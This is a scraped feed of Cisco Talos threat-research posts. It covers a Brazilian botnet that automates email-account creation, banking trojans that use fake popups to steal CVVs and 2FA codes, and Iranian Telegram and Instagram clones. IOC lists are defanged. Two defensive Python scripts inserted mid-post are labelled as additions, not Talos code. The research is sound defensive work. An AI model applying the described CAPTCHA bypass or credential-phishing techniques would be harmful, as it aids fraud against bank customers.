This malware is a remote administration tool with the capability to create email accounts. The accounts are created on the <a href="https://en.wikipedia.org/wiki/Brasil_Online">BOL Online</a> email platform, an internet portal that provides email hosting and free email services in Brazil. The attacker's main goal appears to be building a botnet of systems dedicated to email account creation.<br /><br />The malware is developed in C# and contains many Portuguese strings.<br /><br />Here is the function used to create a BOL email account:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-o49KzA96VN0/W-GcBSvzi-I/AAAAAAAAAkM/Hrv1OKMGaUQ8brsxUiEJ529fnH9WKyGHACLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="866" data-original-width="1600" height="346" src="https://4.bp.blogspot.com/-o49KzA96VN0/W-GcBSvzi-I/AAAAAAAAAkM/Hrv1OKMGaUQ8brsxUiEJ529fnH9WKyGHACLcBGAs/s640/image1.png" width="640" /></a></div><br />Once an account is created, the randomly generated username and password are sent to a C2 server. BOL Online uses a CAPTCHA to keep machines from creating accounts. 
To bypass this protection, the malware author uses the Recaptcha API with a token provided by the C2 server:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-FoAW-T9H-C0/W-GcNhXtOgI/AAAAAAAAAkU/eV_yVBe3nYgal8VzCW6RgbtcOlMPdOhcwCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="1055" height="330" src="https://3.bp.blogspot.com/-FoAW-T9H-C0/W-GcNhXtOgI/AAAAAAAAAkU/eV_yVBe3nYgal8VzCW6RgbtcOlMPdOhcwCLcBGAs/s640/image4.png" width="640" /></a></div><br />During our investigation, all the created email addresses were prefixed with "financeir."<br /><br />The trojan can clean itself up, send the created email credentials, restart, and download and execute binaries provided by the C2 server.<br /><br />Talos identified three C2 servers:<br /><br /><ul><li>hxxp://criadoruol[.]site/</li><li>hxxp://jdm-tuning[.]ru/</li><li>hxxp://www[.]500csgo[.]ru/</li></ul><br /><br />We identified more than 700 compromised systems registered on these servers as members of the botnet. The oldest machine was compromised on Oct. 23. This botnet created more than 4,000 unique email accounts on the BOL Online service using the aforementioned technique. Some of these accounts were used to initiate the spam campaigns we tracked as part of this research.<br /><br />Given the filename patterns and the victimology, along with the specific targeting of both campaigns, Talos assesses with moderate confidence that both campaigns used the same email generation tool we discovered in the actor's open S3 bucket. This links both campaigns to the same actor and toolset; the actor likely tried different delivery methods and email lists to deliver the malspam.<br /><br /><h2 id="h.bhnwmh4yso97">Final payload</h2><br />We identified two different payloads deployed during these campaigns. 
The payloads are developed in Delphi and are banking trojans targeting Brazilian banks.<br /><br />Fellow security firm FireEye already covered the first payload <a href="https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html">here</a>. It collects information about the compromised system and exfiltrates it to a C2 server. It also includes a keylogger, the same one found in the second payload described below. When the user is logged into their bank's website, the malware can interact with them by showing a fake popup that claims to come from the bank. Here is an example that attempts to steal the user's CVV:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-i6Wxx8IoVu0/W-GcS2CRmwI/AAAAAAAAAkc/lZ8pHnyKzBck4XV6jgbpIcXdee-lInv9gCLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="647" data-original-width="665" height="620" src="https://4.bp.blogspot.com/-i6Wxx8IoVu0/W-GcS2CRmwI/AAAAAAAAAkc/lZ8pHnyKzBck4XV6jgbpIcXdee-lInv9gCLcBGAs/s640/image5.png" width="640" /></a></div><br />The second payload has exactly the same features but is implemented differently. 
It mainly targets two-factor authentication by displaying fake popups to the user:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-9cMraGaXg1I/W-GcXU9Vz5I/AAAAAAAAAkg/PWCGA63XP3w-HOSPTRavt041GiRGRakpwCLcBGAs/s1600/image11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="431" data-original-width="646" height="426" src="https://3.bp.blogspot.com/-9cMraGaXg1I/W-GcXU9Vz5I/AAAAAAAAAkg/PWCGA63XP3w-HOSPTRavt041GiRGRakpwCLcBGAs/s640/image11.png" width="640" /></a></div><br />A keylogger then captures the information entered by the target.<br /><br />The following financial services organizations are targeted by this malware: Santander, Itaú, Banco do Brasil, Caixa, Sicredi, Bradesco, Safra, Sicoob, Banco da Amazonia, Banco do Nordeste, Banestes, Banrisul, Banco de Brasilia and Citi.<br /><br /><h2 id="h.vl84nga5yg5r">Conclusion</h2><br />This strain of malware is prevalent throughout the world and is further proof that banking trojans remain popular. With this sample the attacker targets specific Brazilian banking institutions, which could suggest the attacker is based in South America, where it would be easier to use the obtained details and credentials to carry out illicit financial activity. We will continue to monitor financial crimeware activity throughout the threat landscape. 
This is not a sophisticated trojan, and most banking malware rarely is, but it is the latest example of how easy it can be for criminals to steal from users by abusing spam to deliver their malicious payloads. This threat also shows the lengths actors will go to in order to obtain additional email accounts to abuse, building an automated mechanism that generates new accounts for further spam campaigns.<br /><br /><h2 id="h.6i86xkbp2smh">Coverage</h2><br />Additional ways our customers can detect and block this threat are listed below.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-MTF4wljGuE0/W-GccKJ7PmI/AAAAAAAAAkk/Wo2E3cJ5bDEnfu53_rl4vrNzyiNFiMsRgCLcBGAs/s1600/image8.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="268" data-original-width="320" src="https://3.bp.blogspot.com/-MTF4wljGuE0/W-GccKJ7PmI/AAAAAAAAAkk/Wo2E3cJ5bDEnfu53_rl4vrNzyiNFiMsRgCLcBGAs/s1600/image8.png" /></a></div><br />Advanced Malware Protection (<a href="https://www.cisco.com/c/en/us/products/security/advanced-malware-protection">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />Cisco Cloud Web Security (<a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html">CWS</a>) or <a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">Web Security Appliance (WSA)</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as<a 
href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html"> </a><a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html">Next-Generation Firewall (NGFW</a>),<a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"> Next-Generation Intrusion Prevention System (NGIPS</a>), and<a href="https://meraki.cisco.com/products/appliances"> Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href="https://umbrella.cisco.com/">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>.<br /><br /><h2 id="h.57ejqrrdgqmm">Indicators of Compromise (IOCs)</h2><br />The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of associated malicious activity.<br /><br /><h3 id="h.pztzu8hd25fe">Campaign #1</h3><br /><h4 id="h.nfjnyrq5q3dg">Stage 1 Downloaders (LNK Shortcuts):</h4><br />627a24cb61ace84a51dd752e181629ffa6faf8ce5cb152696bd65a1842cf58fd<br /><br /><h4 id="h.1hu14o6t0t6l">Stage 1 Downloaders Filenames (LNK Shortcuts):</h4><br />_Fatura pendente - HCBF.lnk<br /><br /><h4 id="h.28d0c6ry3opn">Stage 2 URLs</h4><br />hxxps://marcondesduartesousa2018[.]000webhostapp[.]com/downs/imagemFr.bmp<br />hxxps://s3-eu-west-1[.]amazonaws[.]com/killino2/image2.png<br /><br /><h4 id="h.vk3vlv6falc9">Stage 2 Powershell</h4><br />01fd7fdb435d60544d95f420f7813e6a30b6fa64bf4f1522053144a02f961e39<br /><br /><h4 
id="h.7yf10s1qmcct">Stage 3 Archive</h4><br />a01287a79e76cb6f3a9296ecf8c147c05960de44fe8b54a5800d538e5c745f84<br /><br /><h4 id="h.6en2pb7sl2zt">Stage 3 Loader</h4><br />1ed49bd3e9df63aadcb573e37dfcbafffbb04acb2e4101b68d02ecda9da1eee7<br /><br /><h4 id="h.wdzq6ob5tqaw">Stage 3 Compressed Payload</h4><br />3ff7d275471bb29199142f8f764674030862bc8353c2a713333d801be6de6482<br /><br /><h4 id="h.7fmauqcao4q2">Stage 4 Final Payload</h4><br />61df7e7aad94942cb0bb3582aed132660caf34a3a4b970d69359e83e601cbcdb<br /><br /><h3 id="h.p7jw3mfvc6c4">Campaign #2</h3><br /><h4 id="h.a7zu133q371u">Stage 1 PE32 Executables:</h4><br />3b237b8a76dce85e63c006db94587f979af01fbda753ae88c13af5c63c625a12<br />46d77483071c145819b5a8ee206df89493fbe8de7847f2869b085b5a3cb04d2c<br />bce660e64ebdf5d4095cee631d0e5eafbdf052505bc5ff546c6fbbb627dbff51<br />7b241c6c12e4944a53c84814598695acc788dfd059d423801ff23d1a9ed7bbd2<br />91781126feeae4d1a783f3103dd5ed0f8fc4f2f8e6f51125d1bfc06683b01c39<br /><br /><h4 id="h.u5d68z69hdm3">Stage 1 PE32 Filenames:</h4><br />_Fatura pendente - QD95.exe<br />_Fatura pendente - QW2I.exe<br />_Fatura pendente - 9X3H.exe<br /><br /><h4 id="h.s7v5ovglhwtp">Stage 1 Archive Filenames:</h4><br />Fatura-2308132084.zip<br /><br /><h4 id="h.xrpqe3c0g6ns">Stage 1 URLs:</h4><br />hxxp://pgs99[.]online:80/script.txt<br />hxxp://pgs99[.]online:80/bb.jpg<br /><br /><h4 id="h.dixx7d1eago">Stage 1 Domains:</h4><br />pgs99[.]online<br /><br /><h4 id="h.6ltu3atsjq1n">Stage 2 URLs:</h4><br />hxxp://srv99[.]tk:80/conta/?89dhu2u09uh4hhy4rr8<br />hxxp://srv99[.]tk:80/favicon.ico<br /><br /><h4 id="h.jn824nqq15dq">Link Shorteners:</h4><br />hxxps://bit[.]ly/2CTUB9H#<br />hxxps://bit[.]ly/2SdhUQl?8438h84hy389<br /><br /><h4 id="h.xayyg4d2eelk">C2 Domains:</h4><br />hxxp://mydhtv[.]ddns[.]net:80/<br /><br /><h3 id="h.5dw2hzkwq93x">Spam tools</h3><br /><h4 id="h.mf0b6t1r9dbp">PE Sample:</h4><br />2a1af665f4692b8ce5330e7b0271cfd3514b468a92d60d032095aebebc9b34c5<br /><br /><h4 id="h.imhd8dmx2839">C2 
Servers:</h4><br />hxxp://criadoruol[.]site/<br />hxxp://jdm-tuning[.]ru/<br />hxxp://www[.]500csgo[.]ru/<br /><br /><h3 id="h.y4605ejxmjfz">Final Payload</h3><br /><h4 id="h.xpzqcu6kkc2x">PE Samples:</h4><br />61df7e7aad94942cb0bb3582aed132660caf34a3a4b970d69359e83e601cbcdb<br />4b49474baaed52ad2a4ae0f2f1336c843eadb22609eda69b5f20537226cf3565<br /><br /></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/IryTCv_UMlU" height="1" width="1" alt=""/>2018-11-08T12:09:12.538-05:000https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.htmlPersian Stalker pillages Iranian users of Instagram and Telegramhttp://feedproxy.google.com/~r/feedburner/Talos/~3/e-ugmy2EZ_k/persian-stalker.htmlAndroidBGPciscoinstagramMalwaremobileTalostelegramnoreply@blogger.com (Vitor Ventura)Mon, 05 Nov 2018 08:55:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-1247949900598653064<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><i>This blog post is authored by <a href="https://twitter.com/dadamitis">Danny Adamatis</a>, <a href="https://twitter.com/SecurityBeard">Warren Mercer</a>, <a href="https://twitter.com/r00tbsd">Paul Rascagneres</a>, <a href="https://twitter.com/_vventura">Vitor Ventura</a> and with the contributions of <a href="https://twitter.com/E191145">Eric Kuhla</a>.</i><br /><h2 id="h.ci5sku2rgucv">Introduction</h2><div style="text-align: left;">State-sponsored actors have a number of different techniques at their disposal to remotely gain access to social media and secure messaging applications. Starting in 2017 and continuing through 2018, Cisco Talos has seen different techniques being used to attack users and steal their private information. 
These techniques used fake login pages, malicious apps disguised as their legitimate counterparts and BGP hijacking, and were specifically targeting Iranian users of the secure messaging app Telegram and the social media site Instagram.</div></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Telegram has become a popular target for greyware in Iran, as the app is used by an estimated <a href="http://aftabnews.ir/fa/news/502050">40 million users</a>. While it's mostly used for daily communication, protest organizers also used it in the past to organize demonstrations against the Iranian government, specifically in December 2017. In a few instances, the Iranian government asked Telegram to <a href="http://www.telegraph.co.uk/news/2017/12/30/iranian-students-clash-police-tehran-protests-enter-third-day/">shut down certain channels for "promoting violence."</a> The tactics outlined in this post have been in use since 2017 in an effort to gather information about Telegram and Instagram users. The campaigns vary in complexity, resource needs and methods. Below, we outline examples of a network attack, application clones and classic phishing. It is our belief that these campaigns were used to specifically target Iranian users of the Telegram app in an effort to steal personal and login information.</div><a name='more'></a><div style="text-align: left;">Once installed, some of these Telegram "clones" have access to mobile devices' full contact lists and messages, even if the users are also using the legitimate Telegram app. In the case of phony Instagram apps, the malicious software sends full session data back to backend servers, which allows the attacker to take full control of the account in use. We assess with high confidence that these apps should be classified as "greyware": they are not malicious enough to be classified as malware, but are suspicious enough to be considered potentially unwanted programs (PUPs). 
This kind of software is difficult to detect, as it typically performs the functions the user expects of it (sending messages, for example). Security researchers usually only notice it when it has an impact somewhere else. Talos eventually discovered several pieces of software that have the potential to be used in far-reaching campaigns. We believe this greyware has the potential to reduce the privacy and security of the mobile users who install these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Another method we saw in the Iranian attacks was the creation of fake login pages. Even though this isn't an advanced technique, it is effective against users who aren't as aware of cybersecurity as they should be. Iran-connected groups like "Charming Kitten" have been using this technique for a while to target secure messaging apps. Some actors also hijack BGP routes. Nothing is hijacked on the device itself: the attacker announces routes for IP address space it does not own, and routers that accept the announcement forward traffic for that space to the attacker without validating the origin of the new routes. Hijacking BGP needs some sort of cooperation from an internet service provider (ISP), and it is easily detectable, so the new routes won't be in place for very long.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Talos hasn't found a solid connection between the several attacks we've observed, but all of them target Iran, its nationals and the Telegram app. Although this post focuses on Iran, mobile users across the globe still need to be aware that these techniques could be used by any threat actor in any country, state-sponsored or not. 
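<br /><br />The "easily detectable" part of the BGP hijacking described above deserves a concrete illustration. A hijack shows up in public route collectors as an announcement whose origin AS, or whose prefix length, disagrees with what the legitimate holder of the address space has authorised. The following Python script is an added example written for this page, not code from the Talos post: it applies the RFC 6811 route origin validation rule (valid, invalid or not found) to a constructed set of announcements and ROAs. The ROAs, the announcements and the AS numbers are all made up for the example, using documentation prefixes and private-use AS numbers, so it runs offline.

```python
# Added example (not from the Talos post): route origin validation as a hijack detector.
# A hijack shows up as an announcement whose origin AS, or whose prefix length, disagrees
# with what the holder of the address space authorised in a ROA (RFC 6811 semantics).
# All ROAs, announcements and AS numbers below are constructed for the example, using
# documentation prefixes (RFC 5737 / RFC 3849) and private-use AS numbers.
import ipaddress
from typing import NamedTuple


class Roa(NamedTuple):
    prefix: str       # address space covered by the authorisation
    origin_as: int    # AS allowed to originate it
    max_length: int   # longest more-specific that AS may announce


class Announcement(NamedTuple):
    prefix: str
    as_path: tuple    # leftmost = nearest neighbour, rightmost = origin AS


def covering_roas(route, roas):
    """ROAs whose prefix contains the announced prefix (same address family only)."""
    found = []
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix)
        if roa_net.version == route.version and route.subnet_of(roa_net):
            found.append(roa)
    return found


def validate(ann, roas):
    """Return ('valid' | 'invalid' | 'not_found', reason) for one announcement."""
    route = ipaddress.ip_network(ann.prefix)
    origin = ann.as_path[-1]
    covering = covering_roas(route, roas)
    if not covering:
        return "not_found", "no ROA covers %s" % ann.prefix
    for roa in covering:
        if roa.origin_as == origin and route.prefixlen <= roa.max_length:
            return "valid", "matches ROA %s AS%d maxLength %d" % roa
    expected = sorted({r.origin_as for r in covering})
    if origin not in expected:
        return "invalid", "origin AS%d not authorised for %s (expected %s)" % (
            origin, ann.prefix, ", ".join("AS%d" % a for a in expected))
    return "invalid", "/%d is more specific than any ROA allows AS%d to announce" % (
        route.prefixlen, origin)


def detect_hijacks(announcements, roas):
    """Every announcement that is not RPKI-valid, with the reason, in input order."""
    findings = []
    for ann in announcements:
        status, reason = validate(ann, roas)
        if status != "valid":
            findings.append((ann, status, reason))
    return findings


# Constructed data: what the holder of 203.0.113.0/24 and 2001:db8::/32 published.
SAMPLE_ROAS = [
    Roa("203.0.113.0/24", 64496, 24),
    Roa("2001:db8::/32", 64496, 48),
]

# Constructed route-collector view: legitimate routes plus three problems.
SAMPLE_ANNOUNCEMENTS = [
    Announcement("203.0.113.0/24", (64500, 64496)),     # legitimate origin
    Announcement("203.0.113.0/24", (64500, 64511)),     # same prefix, wrong origin: hijack
    Announcement("203.0.113.128/25", (64500, 64496)),   # more specific than maxLength allows
    Announcement("198.51.100.0/24", (64500, 64497)),    # no ROA at all: cannot be judged
    Announcement("2001:db8:1::/48", (64500, 64496)),    # legitimate IPv6 more-specific
]


if __name__ == "__main__":
    for ann, status, reason in detect_hijacks(SAMPLE_ANNOUNCEMENTS, SAMPLE_ROAS):
        print("%-10s %-20s AS%d: %s" % (status, ann.prefix, ann.as_path[-1], reason))
```

In practice the ROA list would come from an RPKI validator and the announcements from a looking glass or a BGP monitoring feed. The two "invalid" results are what a hijack (wrong origin) and a more-specific hijack look like; "not_found" only means the holder never published a ROA, which is why a monitoring feed is still needed for prefixes without one.<br /><br />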
The risk from cloned applications is especially acute in countries like Iran and Russia, where apps like Telegram are banned and developers create clones that appear on official and unofficial app stores to replicate Telegram's services.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">A regular user can't do anything about the BGP hijacking, but using legitimate applications from the official application stores reduces the risk. The same rule applies to the cloned applications: installing applications from untrusted sources carries a degree of risk that users must be aware of. In both situations, this risk is substantially increased when the applications are unofficial "enhanced functionality" applications, even when they are available on the official Google Play store.</div><h2 id="h.qtw3bcepjoo3"><span style="font-size: large;">Tactics</span></h2><h3 id="h.4wez80pslkob">Functionality enhancement applications (grey)</h3><h4 id="h.bj3riohrija2">Andromedaa.ir and Cambridge Universal Academy</h4><b>Description of andromedaa.ir</b><br /><br />Talos identified a software developer completely focused on the Iranian market. The publisher goes by the name "andromedaa.ir" on both iOS and Android platforms. It develops software intended to increase users' exposure on social media networks, like Instagram, as well as the number of Iranian users on certain Telegram channels.<br /><div style="text-align: left;"><br /></div><div style="text-align: left;">While looking at the website, and more specifically the installation links, it is clear that none of these applications are published in the official application stores (Google or Apple), which is likely due to sanctions put in place against Iran by the U.S. 
government.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Rp4s-lAqXfc/W-BazaFOQDI/AAAAAAAAAP4/EXULRDr8SNABWj9FCWqWMAZeVNjKhmwGwCK4BGAYYCw/s1600/image16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="https://2.bp.blogspot.com/-Rp4s-lAqXfc/W-BazaFOQDI/AAAAAAAAAP4/EXULRDr8SNABWj9FCWqWMAZeVNjKhmwGwCK4BGAYYCw/s640/image16.png" width="640" /></a></div><div style="text-align: center;">Whois information for andromedaa.ir</div><br /><div style="text-align: left;">The andromedaa.ir domain is registered with the <span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">h0mayun@outlook.com</span> email address. This is the same email address used to register other domains for the cloned Instagram and Telegram applications (see other sections below).</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Talos identified various domains after analysing the whois information associated with the domain andromedaa[.]com, all but one registered with the same phone number.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-qSmYUBcM-bo/W-BwpK4IIAI/AAAAAAAAAVY/GEX5CsyODGQcPCE6J2J1PaOrCJh06rf6ACK4BGAYYCw/s1600/Screenshot%2B2018-11-05%2Bat%2B16.32.20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="520" src="https://3.bp.blogspot.com/-qSmYUBcM-bo/W-BwpK4IIAI/AAAAAAAAAVY/GEX5CsyODGQcPCE6J2J1PaOrCJh06rf6ACK4BGAYYCw/s640/Screenshot%2B2018-11-05%2Bat%2B16.32.20.png" width="640" /></a></div><div style="text-align: center;">A partial list of the domains found</div><br />We scanned the IP addresses associated with the aforementioned domains, which revealed a pattern in their use of SSL certificates.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="http://4.bp.blogspot.com/-3ByVph3s5D8/W-BbWRBcPAI/AAAAAAAAAQE/Zdy-2n1eyl8_cA_wfm14RDpiqx-GszcsQCK4BGAYYCw/s1600/image10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://4.bp.blogspot.com/-3ByVph3s5D8/W-BbWRBcPAI/AAAAAAAAAQE/Zdy-2n1eyl8_cA_wfm14RDpiqx-GszcsQCK4BGAYYCw/s640/image10.png" width="640" /></a></div><div style="text-align: center;">Certificate information</div><br /><div style="text-align: left;">This SSL certificate analysis revealed an additional domain — flbgr[.]com — whose whois information was privacy protected. Based on the low prevalence of those certificate values across the internet, Talos associates this domain with the same threat actor with high confidence. The domain flbgr[.]com was registered on Aug. 6, 2018, making it the most recently registered domain, and resolved to the IP address 145.239.65[.]25. Cisco Farsight data showed other domains also resolve to that same IP address.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-qMdOFPkmdIg/W-BbfvbhjPI/AAAAAAAAAQM/CrpdR21QzOQkYIa4wzwhVORJEp_Kx01ZQCK4BGAYYCw/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://2.bp.blogspot.com/-qMdOFPkmdIg/W-BbfvbhjPI/AAAAAAAAAQM/CrpdR21QzOQkYIa4wzwhVORJEp_Kx01ZQCK4BGAYYCw/s640/image7.png" width="640" /></a></div><div style="text-align: center;">List of domains associated with the same IP address</div><br />Talos then discovered an SSL certificate with the common name followerbegir[.]ir (its SHA256 fingerprint is in the certificate information shown below), and found another certificate that was very similar in nature. 
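<br /><br />The pivot used above, registrant email and phone from whois, shared hosting IPs from passive DNS, and certificate subject fields that are rare enough (typos included) to be meaningful, can be automated. The following Python script is an added example, not part of the Talos post: it links domains that share a low-prevalence indicator exactly, or whose certificate organization names are within one edit of each other, and groups them with a union-find structure. The records are constructed (example domains, documentation IPs, placeholder fingerprints) and only mirror the shape of the data in this section; the prevalence cap of three is an arbitrary choice for the sample.

```python
# Added example (not from the Talos post): cluster domains by shared infrastructure
# indicators. Exact matches on low-prevalence values (registrant email or phone, hosting
# IP, certificate fingerprint, certificate organization) link two domains; certificate
# organization names within one edit of each other (the "andromeda"/"andromedaa" case)
# link them too. The records below are constructed and only mirror the data's shape.
import itertools
from collections import defaultdict

EXACT_FIELDS = ("registrant_email", "registrant_phone", "ip", "cert_sha256", "cert_org")
FUZZY_FIELDS = ("cert_org",)
MAX_PREVALENCE = 3   # a value seen on more domains than this is treated as noise (assumption)


def edit_distance(a, b):
    """Levenshtein distance; inputs are short, so the O(len(a)*len(b)) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


class DisjointSet:
    def __init__(self, items):
        self.parent = {x: x for x in items}

    def find(self, x):
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]   # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        self.parent[self.find(a)] = self.find(b)


def cluster(records, max_prevalence=MAX_PREVALENCE, max_edits=1):
    """Return (clusters, edges): sorted domain groups and the (a, b, field, va, vb) links behind them."""
    dsu = DisjointSet(r["domain"] for r in records)
    edges = []
    for field in EXACT_FIELDS:
        by_value = defaultdict(list)
        for r in records:
            if r.get(field):
                by_value[r[field].lower()].append(r["domain"])
        for value, domains in by_value.items():
            if len(domains) > max_prevalence:      # privacy proxy, shared host: not a pivot
                continue
            for a, b in zip(domains, domains[1:]):
                dsu.union(a, b)
                edges.append((a, b, field, value, value))
    for field in FUZZY_FIELDS:
        named = [(r["domain"], r[field].lower()) for r in records if r.get(field)]
        for (da, va), (db, vb) in itertools.combinations(named, 2):
            if va != vb and edit_distance(va, vb) <= max_edits:
                dsu.union(da, db)
                edges.append((da, db, field, va, vb))
    groups = defaultdict(list)
    for r in records:
        groups[dsu.find(r["domain"])].append(r["domain"])
    return sorted(sorted(g) for g in groups.values()), edges


# Constructed records: two domains with the same registrant, a privacy-protected third one
# that shares a hosting IP and a typo'd certificate organization, and four unrelated shops
# behind the same registrar privacy address.
SAMPLE_RECORDS = [
    {"domain": "andromedaa.example", "registrant_email": "registrant@example.net",
     "registrant_phone": "+98-21-555-0100", "ip": "198.51.100.10",
     "cert_org": "andromedaa", "cert_sha256": "aa11"},
    {"domain": "followerbegir.example", "registrant_email": "registrant@example.net",
     "registrant_phone": "+98-21-555-0100", "ip": "198.51.100.11",
     "cert_org": "andromedaa", "cert_sha256": "bb22"},
    {"domain": "flbgr.example", "registrant_email": None, "registrant_phone": None,
     "ip": "198.51.100.10", "cert_org": "andromeda", "cert_sha256": "cc33"},
    {"domain": "shop-one.example", "registrant_email": "privacy@proxy.example",
     "ip": "203.0.113.5", "cert_org": "Shop One Ltd"},
    {"domain": "shop-two.example", "registrant_email": "privacy@proxy.example",
     "ip": "203.0.113.6", "cert_org": "Shop Two Ltd"},
    {"domain": "shop-three.example", "registrant_email": "privacy@proxy.example",
     "ip": "203.0.113.7"},
    {"domain": "shop-four.example", "registrant_email": "privacy@proxy.example",
     "ip": "203.0.113.8"},
]


if __name__ == "__main__":
    groups, links = cluster(SAMPLE_RECORDS)
    for g in groups:
        print("cluster:", ", ".join(g))
    for a, b, field, va, vb in links:
        print("  %s -- %s via %s (%s%s)" % (a, b, field, va, "" if va == vb else " ~ " + vb))
```

The prevalence cap is the important knob: a registrar privacy address or a shared CDN address appears on thousands of unrelated domains, and linking through it would merge everything into one cluster (raising the cap in the sample does exactly that to the four shops). The post's own association of flbgr[.]com rests on the same judgement, that the certificate values involved were rare.<br /><br />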
Compared with the followerbegir[.]ir certificate, the second one appeared to contain two typos: one in the common name field, "followbeg.ir," and another in the organization field, where the organization is given as "andromeda" instead of andromedaa.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-AQwQFLL-HAg/W-BboFa4xvI/AAAAAAAAAQY/-YneMrwEQJw8TjNa_Tt2ZibLxefXrHCVACK4BGAYYCw/s1600/image22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="528" src="https://3.bp.blogspot.com/-AQwQFLL-HAg/W-BboFa4xvI/AAAAAAAAAQY/-YneMrwEQJw8TjNa_Tt2ZibLxefXrHCVACK4BGAYYCw/s640/image22.png" width="640" /></a></div><br /><div style="text-align: center;">Certificate information</div><br /><b>Description of&nbsp;</b><b>Cambridge Universal Academy</b><br /><br />Andromedaa.ir published the iOS application, but it's signed with a developer certificate issued to Cambridge Universal Academy Ltd. This is an England and Wales-registered company that offers iOS development services. This same company is owned by an Iranian citizen who owns at least four other companies in four different countries: England, U.S., Turkey and Estonia. 
All of those companies offer the same services and web pages similar in content.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-uQewtAxHEWs/W-Bwbda7ZkI/AAAAAAAAAVQ/9ReGzcpDxrU-ux6-KU_1jMkJN5GbaGFQwCK4BGAYYCw/s1600/Screenshot%2B2018-11-05%2Bat%2B16.31.23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://3.bp.blogspot.com/-uQewtAxHEWs/W-Bwbda7ZkI/AAAAAAAAAVQ/9ReGzcpDxrU-ux6-KU_1jMkJN5GbaGFQwCK4BGAYYCw/s640/Screenshot%2B2018-11-05%2Bat%2B16.31.23.png" width="640" /></a></div><br /><br /><div style="text-align: left;"><span style="text-align: justify;">Google flagged the URL mohajer.co.uk for phishing, which might be related to the fact that this site, along with Mohajer.eu, offers visa services for the U.K., U.S., Canada, Australia and other countries in the European Economic Area.</span></div><br /><b> Business model</b><br /><b><br /></b><br /><div style="text-align: left;">All of the andromedaa.ir applications are meant to increase users' exposure on Instagram or Telegram by increasing the likes, comments, followers or even the number of users in a specific Telegram channel. All this comes with the guarantee that only Iranian users will perform such actions. 
